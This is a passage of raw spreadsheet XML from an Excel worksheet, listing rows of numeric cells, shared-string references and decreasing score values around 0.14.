        <v>1.4220311E7</v>
      </c>
      <c r="C16746" s="2" t="s">
        <v>16154</v>
      </c>
      <c r="D16746" s="2">
        <v>1.0</v>
      </c>
      <c r="E16746" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16746" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16747" ht="15.75" customHeight="1">
      <c r="A16747" s="1">
        <v>25550.0</v>
      </c>
      <c r="B16747" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C16747" s="2" t="s">
        <v>16155</v>
      </c>
      <c r="D16747" s="2">
        <v>1.0</v>
      </c>
      <c r="E16747" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16747" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16748" ht="15.75" customHeight="1">
      <c r="A16748" s="1">
        <v>25591.0</v>
      </c>
      <c r="B16748" s="2">
        <v>1.4354024E7</v>
      </c>
      <c r="C16748" s="2" t="s">
        <v>16156</v>
      </c>
      <c r="D16748" s="2">
        <v>1.0</v>
      </c>
      <c r="E16748" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16748" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16749" ht="15.75" customHeight="1">
      <c r="A16749" s="1">
        <v>31749.0</v>
      </c>
      <c r="B16749" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C16749" s="2" t="s">
        <v>16157</v>
      </c>
      <c r="D16749" s="2">
        <v>1.0</v>
      </c>
      <c r="E16749" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16749" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="16750" ht="15.75" customHeight="1">
      <c r="A16750" s="1">
        <v>18512.0</v>
      </c>
      <c r="B16750" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C16750" s="2" t="s">
        <v>16158</v>
      </c>
      <c r="D16750" s="2">
        <v>1.0</v>
      </c>
      <c r="E16750" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16750" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="16751" ht="15.75" customHeight="1">
      <c r="A16751" s="1">
        <v>33526.0</v>
      </c>
      <c r="B16751" s="2">
        <v>8115741.0</v>
      </c>
      <c r="C16751" s="2" t="s">
        <v>16159</v>
      </c>
      <c r="D16751" s="2">
        <v>1.0</v>
      </c>
      <c r="E16751" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16751" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="16752" ht="15.75" customHeight="1">
      <c r="A16752" s="1">
        <v>20356.0</v>
      </c>
      <c r="B16752" s="2">
        <v>1.1663155E7</v>
      </c>
      <c r="C16752" s="2" t="s">
        <v>16160</v>
      </c>
      <c r="D16752" s="2">
        <v>1.0</v>
      </c>
      <c r="E16752" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16752" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="16753" ht="15.75" customHeight="1">
      <c r="A16753" s="1">
        <v>27791.0</v>
      </c>
      <c r="B16753" s="2">
        <v>2.3137593E7</v>
      </c>
      <c r="C16753" s="2" t="s">
        <v>16161</v>
      </c>
      <c r="D16753" s="2">
        <v>1.0</v>
      </c>
      <c r="E16753" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16753" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="16754" ht="15.75" customHeight="1">
      <c r="A16754" s="1">
        <v>25105.0</v>
      </c>
      <c r="B16754" s="2">
        <v>1.295379E7</v>
      </c>
      <c r="C16754" s="2" t="s">
        <v>16162</v>
      </c>
      <c r="D16754" s="2">
        <v>1.0</v>
      </c>
      <c r="E16754" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16754" s="2">
        <v>0.1472222222222222</v>
      </c>
    </row>
    <row r="16755" ht="15.75" customHeight="1">
      <c r="A16755" s="1">
        <v>30062.0</v>
      </c>
      <c r="B16755" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C16755" s="2" t="s">
        <v>16163</v>
      </c>
      <c r="D16755" s="2">
        <v>1.0</v>
      </c>
      <c r="E16755" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16755" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="16756" ht="15.75" customHeight="1">
      <c r="A16756" s="1">
        <v>27750.0</v>
      </c>
      <c r="B16756" s="2">
        <v>2.3094987E7</v>
      </c>
      <c r="C16756" s="2" t="s">
        <v>16164</v>
      </c>
      <c r="D16756" s="2">
        <v>1.0</v>
      </c>
      <c r="E16756" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16756" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="16757" ht="15.75" customHeight="1">
      <c r="A16757" s="1">
        <v>10406.0</v>
      </c>
      <c r="B16757" s="2">
        <v>9696486.0</v>
      </c>
      <c r="C16757" s="2" t="s">
        <v>16165</v>
      </c>
      <c r="D16757" s="2">
        <v>1.0</v>
      </c>
      <c r="E16757" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16757" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="16758" ht="15.75" customHeight="1">
      <c r="A16758" s="1">
        <v>10490.0</v>
      </c>
      <c r="B16758" s="2">
        <v>1.1018368E7</v>
      </c>
      <c r="C16758" s="2" t="s">
        <v>16166</v>
      </c>
      <c r="D16758" s="2">
        <v>1.0</v>
      </c>
      <c r="E16758" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16758" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="16759" ht="15.75" customHeight="1">
      <c r="A16759" s="1">
        <v>14071.0</v>
      </c>
      <c r="B16759" s="2">
        <v>3.7638711E7</v>
      </c>
      <c r="C16759" s="2" t="s">
        <v>16167</v>
      </c>
      <c r="D16759" s="2">
        <v>1.0</v>
      </c>
      <c r="E16759" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16759" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="16760" ht="15.75" customHeight="1">
      <c r="A16760" s="1">
        <v>15864.0</v>
      </c>
      <c r="B16760" s="2">
        <v>4.4500741E7</v>
      </c>
      <c r="C16760" s="2" t="s">
        <v>16168</v>
      </c>
      <c r="D16760" s="2">
        <v>1.0</v>
      </c>
      <c r="E16760" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16760" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="16761" ht="15.75" customHeight="1">
      <c r="A16761" s="1">
        <v>21583.0</v>
      </c>
      <c r="B16761" s="2">
        <v>2.3887895E7</v>
      </c>
      <c r="C16761" s="2" t="s">
        <v>16169</v>
      </c>
      <c r="D16761" s="2">
        <v>1.0</v>
      </c>
      <c r="E16761" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16761" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="16762" ht="15.75" customHeight="1">
      <c r="A16762" s="1">
        <v>8454.0</v>
      </c>
      <c r="B16762" s="2">
        <v>5.3975429E7</v>
      </c>
      <c r="C16762" s="2" t="s">
        <v>16170</v>
      </c>
      <c r="D16762" s="2">
        <v>1.0</v>
      </c>
      <c r="E16762" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16762" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="16763" ht="15.75" customHeight="1">
      <c r="A16763" s="1">
        <v>24112.0</v>
      </c>
      <c r="B16763" s="2">
        <v>9939901.0</v>
      </c>
      <c r="C16763" s="2" t="s">
        <v>13823</v>
      </c>
      <c r="D16763" s="2">
        <v>1.0</v>
      </c>
      <c r="E16763" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16763" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="16764" ht="15.75" customHeight="1">
      <c r="A16764" s="1">
        <v>27859.0</v>
      </c>
      <c r="B16764" s="2">
        <v>2.3429009E7</v>
      </c>
      <c r="C16764" s="2" t="s">
        <v>16171</v>
      </c>
      <c r="D16764" s="2">
        <v>1.0</v>
      </c>
      <c r="E16764" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16764" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="16765" ht="15.75" customHeight="1">
      <c r="A16765" s="1">
        <v>14043.0</v>
      </c>
      <c r="B16765" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C16765" s="2" t="s">
        <v>16172</v>
      </c>
      <c r="D16765" s="2">
        <v>1.0</v>
      </c>
      <c r="E16765" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16765" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="16766" ht="15.75" customHeight="1">
      <c r="A16766" s="1">
        <v>33843.0</v>
      </c>
      <c r="B16766" s="2">
        <v>9013437.0</v>
      </c>
      <c r="C16766" s="2" t="s">
        <v>16173</v>
      </c>
      <c r="D16766" s="2">
        <v>1.0</v>
      </c>
      <c r="E16766" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16766" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="16767" ht="15.75" customHeight="1">
      <c r="A16767" s="1">
        <v>10471.0</v>
      </c>
      <c r="B16767" s="2">
        <v>1.0871077E7</v>
      </c>
      <c r="C16767" s="2" t="s">
        <v>16174</v>
      </c>
      <c r="D16767" s="2">
        <v>1.0</v>
      </c>
      <c r="E16767" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16767" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16768" ht="15.75" customHeight="1">
      <c r="A16768" s="1">
        <v>20490.0</v>
      </c>
      <c r="B16768" s="2">
        <v>1.286818E7</v>
      </c>
      <c r="C16768" s="2" t="s">
        <v>16175</v>
      </c>
      <c r="D16768" s="2">
        <v>1.0</v>
      </c>
      <c r="E16768" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16768" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16769" ht="15.75" customHeight="1">
      <c r="A16769" s="1">
        <v>21144.0</v>
      </c>
      <c r="B16769" s="2">
        <v>1.8657896E7</v>
      </c>
      <c r="C16769" s="2" t="s">
        <v>16176</v>
      </c>
      <c r="D16769" s="2">
        <v>1.0</v>
      </c>
      <c r="E16769" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16769" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16770" ht="15.75" customHeight="1">
      <c r="A16770" s="1">
        <v>21506.0</v>
      </c>
      <c r="B16770" s="2">
        <v>2.3137594E7</v>
      </c>
      <c r="C16770" s="2" t="s">
        <v>16161</v>
      </c>
      <c r="D16770" s="2">
        <v>1.0</v>
      </c>
      <c r="E16770" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16770" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16771" ht="15.75" customHeight="1">
      <c r="A16771" s="1">
        <v>21987.0</v>
      </c>
      <c r="B16771" s="2">
        <v>2.9444262E7</v>
      </c>
      <c r="C16771" s="2" t="s">
        <v>16177</v>
      </c>
      <c r="D16771" s="2">
        <v>1.0</v>
      </c>
      <c r="E16771" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16771" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16772" ht="15.75" customHeight="1">
      <c r="A16772" s="1">
        <v>22102.0</v>
      </c>
      <c r="B16772" s="2">
        <v>3.0834654E7</v>
      </c>
      <c r="C16772" s="2" t="s">
        <v>16178</v>
      </c>
      <c r="D16772" s="2">
        <v>1.0</v>
      </c>
      <c r="E16772" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16772" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16773" ht="15.75" customHeight="1">
      <c r="A16773" s="1">
        <v>22429.0</v>
      </c>
      <c r="B16773" s="2">
        <v>3.6178199E7</v>
      </c>
      <c r="C16773" s="2" t="s">
        <v>16179</v>
      </c>
      <c r="D16773" s="2">
        <v>1.0</v>
      </c>
      <c r="E16773" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16773" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16774" ht="15.75" customHeight="1">
      <c r="A16774" s="1">
        <v>23011.0</v>
      </c>
      <c r="B16774" s="2">
        <v>4.9850203E7</v>
      </c>
      <c r="C16774" s="2" t="s">
        <v>16180</v>
      </c>
      <c r="D16774" s="2">
        <v>1.0</v>
      </c>
      <c r="E16774" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16774" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16775" ht="15.75" customHeight="1">
      <c r="A16775" s="1">
        <v>23878.0</v>
      </c>
      <c r="B16775" s="2">
        <v>8360851.0</v>
      </c>
      <c r="C16775" s="2" t="s">
        <v>16181</v>
      </c>
      <c r="D16775" s="2">
        <v>1.0</v>
      </c>
      <c r="E16775" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16775" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16776" ht="15.75" customHeight="1">
      <c r="A16776" s="1">
        <v>24879.0</v>
      </c>
      <c r="B16776" s="2">
        <v>1.2228573E7</v>
      </c>
      <c r="C16776" s="2" t="s">
        <v>16182</v>
      </c>
      <c r="D16776" s="2">
        <v>1.0</v>
      </c>
      <c r="E16776" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16776" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16777" ht="15.75" customHeight="1">
      <c r="A16777" s="1">
        <v>24951.0</v>
      </c>
      <c r="B16777" s="2">
        <v>1.2563171E7</v>
      </c>
      <c r="C16777" s="2" t="s">
        <v>16183</v>
      </c>
      <c r="D16777" s="2">
        <v>1.0</v>
      </c>
      <c r="E16777" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16777" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16778" ht="15.75" customHeight="1">
      <c r="A16778" s="1">
        <v>25056.0</v>
      </c>
      <c r="B16778" s="2">
        <v>1.2868179E7</v>
      </c>
      <c r="C16778" s="2" t="s">
        <v>16175</v>
      </c>
      <c r="D16778" s="2">
        <v>1.0</v>
      </c>
      <c r="E16778" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16778" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16779" ht="15.75" customHeight="1">
      <c r="A16779" s="1">
        <v>25992.0</v>
      </c>
      <c r="B16779" s="2">
        <v>1.5332537E7</v>
      </c>
      <c r="C16779" s="2" t="s">
        <v>16184</v>
      </c>
      <c r="D16779" s="2">
        <v>1.0</v>
      </c>
      <c r="E16779" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16779" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16780" ht="15.75" customHeight="1">
      <c r="A16780" s="1">
        <v>30021.0</v>
      </c>
      <c r="B16780" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C16780" s="2" t="s">
        <v>16179</v>
      </c>
      <c r="D16780" s="2">
        <v>1.0</v>
      </c>
      <c r="E16780" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16780" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16781" ht="15.75" customHeight="1">
      <c r="A16781" s="1">
        <v>30028.0</v>
      </c>
      <c r="B16781" s="2">
        <v>3.6178198E7</v>
      </c>
      <c r="C16781" s="2" t="s">
        <v>16185</v>
      </c>
      <c r="D16781" s="2">
        <v>1.0</v>
      </c>
      <c r="E16781" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16781" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16782" ht="15.75" customHeight="1">
      <c r="A16782" s="1">
        <v>30064.0</v>
      </c>
      <c r="B16782" s="2">
        <v>3625090.0</v>
      </c>
      <c r="C16782" s="2" t="s">
        <v>16186</v>
      </c>
      <c r="D16782" s="2">
        <v>1.0</v>
      </c>
      <c r="E16782" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16782" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16783" ht="15.75" customHeight="1">
      <c r="A16783" s="1">
        <v>32773.0</v>
      </c>
      <c r="B16783" s="2">
        <v>6083819.0</v>
      </c>
      <c r="C16783" s="2" t="s">
        <v>16187</v>
      </c>
      <c r="D16783" s="2">
        <v>1.0</v>
      </c>
      <c r="E16783" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16783" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16784" ht="15.75" customHeight="1">
      <c r="A16784" s="1">
        <v>33634.0</v>
      </c>
      <c r="B16784" s="2">
        <v>8360850.0</v>
      </c>
      <c r="C16784" s="2" t="s">
        <v>16181</v>
      </c>
      <c r="D16784" s="2">
        <v>1.0</v>
      </c>
      <c r="E16784" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16784" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16785" ht="15.75" customHeight="1">
      <c r="A16785" s="1">
        <v>33785.0</v>
      </c>
      <c r="B16785" s="2">
        <v>8736116.0</v>
      </c>
      <c r="C16785" s="2" t="s">
        <v>16188</v>
      </c>
      <c r="D16785" s="2">
        <v>1.0</v>
      </c>
      <c r="E16785" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16785" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="16786" ht="15.75" customHeight="1">
      <c r="A16786" s="1">
        <v>11144.0</v>
      </c>
      <c r="B16786" s="2">
        <v>1.9332619E7</v>
      </c>
      <c r="C16786" s="2" t="s">
        <v>16189</v>
      </c>
      <c r="D16786" s="2">
        <v>1.0</v>
      </c>
      <c r="E16786" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16786" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16787" ht="15.75" customHeight="1">
      <c r="A16787" s="1">
        <v>18513.0</v>
      </c>
      <c r="B16787" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C16787" s="2" t="s">
        <v>16190</v>
      </c>
      <c r="D16787" s="2">
        <v>1.0</v>
      </c>
      <c r="E16787" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16787" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16788" ht="15.75" customHeight="1">
      <c r="A16788" s="1">
        <v>25352.0</v>
      </c>
      <c r="B16788" s="2">
        <v>1.3553041E7</v>
      </c>
      <c r="C16788" s="2" t="s">
        <v>16191</v>
      </c>
      <c r="D16788" s="2">
        <v>1.0</v>
      </c>
      <c r="E16788" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16788" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16789" ht="15.75" customHeight="1">
      <c r="A16789" s="1">
        <v>30286.0</v>
      </c>
      <c r="B16789" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16789" s="2" t="s">
        <v>16192</v>
      </c>
      <c r="D16789" s="2">
        <v>1.0</v>
      </c>
      <c r="E16789" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16789" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16790" ht="15.75" customHeight="1">
      <c r="A16790" s="1">
        <v>30293.0</v>
      </c>
      <c r="B16790" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C16790" s="2" t="s">
        <v>16193</v>
      </c>
      <c r="D16790" s="2">
        <v>1.0</v>
      </c>
      <c r="E16790" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16790" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16791" ht="15.75" customHeight="1">
      <c r="A16791" s="1">
        <v>30867.0</v>
      </c>
      <c r="B16791" s="2">
        <v>4.6234133E7</v>
      </c>
      <c r="C16791" s="2" t="s">
        <v>16194</v>
      </c>
      <c r="D16791" s="2">
        <v>1.0</v>
      </c>
      <c r="E16791" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16791" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16792" ht="15.75" customHeight="1">
      <c r="A16792" s="1">
        <v>32979.0</v>
      </c>
      <c r="B16792" s="2">
        <v>6590423.0</v>
      </c>
      <c r="C16792" s="2" t="s">
        <v>16195</v>
      </c>
      <c r="D16792" s="2">
        <v>1.0</v>
      </c>
      <c r="E16792" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16792" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="16793" ht="15.75" customHeight="1">
      <c r="A16793" s="1">
        <v>20228.0</v>
      </c>
      <c r="B16793" s="2">
        <v>1.0787611E7</v>
      </c>
      <c r="C16793" s="2" t="s">
        <v>16196</v>
      </c>
      <c r="D16793" s="2">
        <v>1.0</v>
      </c>
      <c r="E16793" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16793" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="16794" ht="15.75" customHeight="1">
      <c r="A16794" s="1">
        <v>33028.0</v>
      </c>
      <c r="B16794" s="2">
        <v>6688357.0</v>
      </c>
      <c r="C16794" s="2" t="s">
        <v>16197</v>
      </c>
      <c r="D16794" s="2">
        <v>1.0</v>
      </c>
      <c r="E16794" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16794" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="16795" ht="15.75" customHeight="1">
      <c r="A16795" s="1">
        <v>8338.0</v>
      </c>
      <c r="B16795" s="2">
        <v>5.3695278E7</v>
      </c>
      <c r="C16795" s="2" t="s">
        <v>16198</v>
      </c>
      <c r="D16795" s="2">
        <v>1.0</v>
      </c>
      <c r="E16795" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16795" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="16796" ht="15.75" customHeight="1">
      <c r="A16796" s="1">
        <v>18817.0</v>
      </c>
      <c r="B16796" s="2">
        <v>5.3919883E7</v>
      </c>
      <c r="C16796" s="2" t="s">
        <v>16199</v>
      </c>
      <c r="D16796" s="2">
        <v>1.0</v>
      </c>
      <c r="E16796" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16796" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="16797" ht="15.75" customHeight="1">
      <c r="A16797" s="1">
        <v>24483.0</v>
      </c>
      <c r="B16797" s="2">
        <v>1.1045432E7</v>
      </c>
      <c r="C16797" s="2" t="s">
        <v>16200</v>
      </c>
      <c r="D16797" s="2">
        <v>1.0</v>
      </c>
      <c r="E16797" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16797" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="16798" ht="15.75" customHeight="1">
      <c r="A16798" s="1">
        <v>343.0</v>
      </c>
      <c r="B16798" s="2">
        <v>1.5922714E7</v>
      </c>
      <c r="C16798" s="2" t="s">
        <v>16201</v>
      </c>
      <c r="D16798" s="2">
        <v>1.0</v>
      </c>
      <c r="E16798" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16798" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="16799" ht="15.75" customHeight="1">
      <c r="A16799" s="1">
        <v>15988.0</v>
      </c>
      <c r="B16799" s="2">
        <v>4.4926596E7</v>
      </c>
      <c r="C16799" s="2" t="s">
        <v>16202</v>
      </c>
      <c r="D16799" s="2">
        <v>1.0</v>
      </c>
      <c r="E16799" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16799" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="16800" ht="15.75" customHeight="1">
      <c r="A16800" s="1">
        <v>33174.0</v>
      </c>
      <c r="B16800" s="2">
        <v>7086250.0</v>
      </c>
      <c r="C16800" s="2" t="s">
        <v>16203</v>
      </c>
      <c r="D16800" s="2">
        <v>1.0</v>
      </c>
      <c r="E16800" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16800" s="2">
        <v>0.1440677966101695</v>
      </c>
    </row>
    <row r="16801" ht="15.75" customHeight="1">
      <c r="A16801" s="1">
        <v>18740.0</v>
      </c>
      <c r="B16801" s="2">
        <v>5.3733759E7</v>
      </c>
      <c r="C16801" s="2" t="s">
        <v>16204</v>
      </c>
      <c r="D16801" s="2">
        <v>1.0</v>
      </c>
      <c r="E16801" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16801" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="16802" ht="15.75" customHeight="1">
      <c r="A16802" s="1">
        <v>23555.0</v>
      </c>
      <c r="B16802" s="2">
        <v>6083820.0</v>
      </c>
      <c r="C16802" s="2" t="s">
        <v>16187</v>
      </c>
      <c r="D16802" s="2">
        <v>1.0</v>
      </c>
      <c r="E16802" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16802" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="16803" ht="15.75" customHeight="1">
      <c r="A16803" s="1">
        <v>32843.0</v>
      </c>
      <c r="B16803" s="2">
        <v>6252743.0</v>
      </c>
      <c r="C16803" s="2" t="s">
        <v>16205</v>
      </c>
      <c r="D16803" s="2">
        <v>1.0</v>
      </c>
      <c r="E16803" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16803" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="16804" ht="15.75" customHeight="1">
      <c r="A16804" s="1">
        <v>39.0</v>
      </c>
      <c r="B16804" s="2">
        <v>1.0715302E7</v>
      </c>
      <c r="C16804" s="2" t="s">
        <v>16206</v>
      </c>
      <c r="D16804" s="2">
        <v>1.0</v>
      </c>
      <c r="E16804" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16804" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16805" ht="15.75" customHeight="1">
      <c r="A16805" s="1">
        <v>1509.0</v>
      </c>
      <c r="B16805" s="2">
        <v>2.7305636E7</v>
      </c>
      <c r="C16805" s="2" t="s">
        <v>16207</v>
      </c>
      <c r="D16805" s="2">
        <v>1.0</v>
      </c>
      <c r="E16805" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16805" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16806" ht="15.75" customHeight="1">
      <c r="A16806" s="1">
        <v>11462.0</v>
      </c>
      <c r="B16806" s="2">
        <v>2.1936021E7</v>
      </c>
      <c r="C16806" s="2" t="s">
        <v>16208</v>
      </c>
      <c r="D16806" s="2">
        <v>1.0</v>
      </c>
      <c r="E16806" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16806" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16807" ht="15.75" customHeight="1">
      <c r="A16807" s="1">
        <v>12446.0</v>
      </c>
      <c r="B16807" s="2">
        <v>2929614.0</v>
      </c>
      <c r="C16807" s="2" t="s">
        <v>16209</v>
      </c>
      <c r="D16807" s="2">
        <v>1.0</v>
      </c>
      <c r="E16807" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16807" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16808" ht="15.75" customHeight="1">
      <c r="A16808" s="1">
        <v>12820.0</v>
      </c>
      <c r="B16808" s="2">
        <v>3.1613418E7</v>
      </c>
      <c r="C16808" s="2" t="s">
        <v>16210</v>
      </c>
      <c r="D16808" s="2">
        <v>1.0</v>
      </c>
      <c r="E16808" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16808" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16809" ht="15.75" customHeight="1">
      <c r="A16809" s="1">
        <v>20813.0</v>
      </c>
      <c r="B16809" s="2">
        <v>1.5332538E7</v>
      </c>
      <c r="C16809" s="2" t="s">
        <v>16211</v>
      </c>
      <c r="D16809" s="2">
        <v>1.0</v>
      </c>
      <c r="E16809" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16809" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16810" ht="15.75" customHeight="1">
      <c r="A16810" s="1">
        <v>21430.0</v>
      </c>
      <c r="B16810" s="2">
        <v>2.2154933E7</v>
      </c>
      <c r="C16810" s="2" t="s">
        <v>16212</v>
      </c>
      <c r="D16810" s="2">
        <v>1.0</v>
      </c>
      <c r="E16810" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16810" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16811" ht="15.75" customHeight="1">
      <c r="A16811" s="1">
        <v>24167.0</v>
      </c>
      <c r="B16811" s="2">
        <v>1.0180944E7</v>
      </c>
      <c r="C16811" s="2" t="s">
        <v>16213</v>
      </c>
      <c r="D16811" s="2">
        <v>1.0</v>
      </c>
      <c r="E16811" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16811" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16812" ht="15.75" customHeight="1">
      <c r="A16812" s="1">
        <v>25773.0</v>
      </c>
      <c r="B16812" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C16812" s="2" t="s">
        <v>16214</v>
      </c>
      <c r="D16812" s="2">
        <v>1.0</v>
      </c>
      <c r="E16812" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16812" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="16813" ht="15.75" customHeight="1">
      <c r="A16813" s="1">
        <v>25996.0</v>
      </c>
      <c r="B16813" s="2">
        <v>1.5332537E7</v>
      </c>
